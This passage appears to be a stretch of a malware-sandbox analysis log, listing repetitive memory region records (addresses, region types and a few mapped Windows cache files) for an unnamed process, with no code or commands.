0xfd82fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f890000" filename = "" Region: id = 1137 start_va = 0x550000 end_va = 0x571fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1138 start_va = 0x580000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000580000" filename = "" Region: id = 1139 start_va = 0x10af0000 end_va = 0x10fe1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010af0000" filename = "" Region: id = 1140 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1141 start_va = 0x550000 end_va = 0x552fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1142 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1143 start_va = 0x560000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1144 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1145 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 1146 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1147 start_va = 0x560000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1148 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1149 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 1150 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1151 start_va = 0x560000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1152 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1153 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 1154 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1155 start_va = 0x560000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1156 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1157 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 1158 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 1159 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1160 start_va = 0x560000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1161 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1162 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 1163 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1164 start_va = 0x560000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1165 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1166 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 1167 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 1168 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1169 start_va = 0x560000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1170 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1171 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 1172 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1173 start_va = 0x560000 end_va = 0x581fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1174 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1175 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 1176 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 1177 start_va = 0x550000 end_va = 0x550fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1178 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1179 start_va = 0x550000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1180 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1181 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1182 start_va = 0x550000 end_va = 0x550fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1183 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1184 start_va = 0x550000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1185 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1186 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1187 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1188 start_va = 0x550000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1189 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1190 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1191 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1192 start_va = 0x550000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1193 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1194 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1195 start_va = 0x550000 end_va = 0x550fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1196 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1197 start_va = 0x550000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1198 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1199 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1200 start_va = 0x550000 end_va = 0x550fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1201 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1202 start_va = 0x550000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1203 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1204 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1205 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1206 start_va = 0x550000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1207 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1208 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1209 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1210 start_va = 0x550000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1211 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1212 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1213 start_va = 0x550000 end_va = 0x550fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1214 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1215 start_va = 0x550000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1216 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1217 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1218 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1219 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 1220 start_va = 0x550000 end_va = 0x550fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1221 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1222 start_va = 0x550000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1223 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1224 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1225 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1226 start_va = 0x550000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1227 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1228 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1229 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1230 start_va = 0x550000 end_va = 0x550fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1231 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1232 start_va = 0x550000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1233 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1234 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1235 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1236 start_va = 0x550000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 1237 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1238 start_va = 0x550000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1239 start_va = 0x550000 end_va = 0x550fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000550000" filename = "" Region: id = 1240 start_va = 0x550000 end_va = 0x553fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 1241 start_va = 0x560000 end_va = 0x563fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 1242 start_va = 0x570000 end_va = 0x587fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000e.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000000e.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000e.db") Region: id = 1243 start_va = 0x550000 end_va = 0x567fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000e.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x000000000000000e.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x000000000000000e.db") Region: id = 1244 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1245 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1246 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1247 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1248 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1249 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1250 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1251 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1252 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1253 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1254 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1255 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1256 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1257 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1258 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1259 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1260 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1261 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1262 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1263 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1264 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1265 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1266 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1267 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1268 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1269 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1270 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1271 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1272 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1273 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1274 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1275 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1276 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1277 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1278 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1279 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1280 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1281 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1282 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1283 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1284 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1285 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1286 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1287 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1288 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1289 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1290 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1291 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1292 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1293 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1294 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1295 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1296 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1297 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1298 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1299 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1300 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1301 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1302 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1303 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1304 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1305 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1306 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1307 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1308 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1309 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1310 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1311 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1312 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1313 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1314 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1315 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1316 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1317 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1318 start_va = 0x570000 end_va = 0x58ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1319 start_va = 0x590000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 1320 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 1321 start_va = 0x590000 end_va = 0x590fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000590000" filename = "" Region: id = 1322 start_va = 0xf890000 end_va = 0xfd82fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f890000" filename = "" Region: id = 1323 start_va = 0x10ff0000 end_va = 0x114e1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010ff0000" filename = "" Region: id = 1324 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1325 start_va = 0x570000 end_va 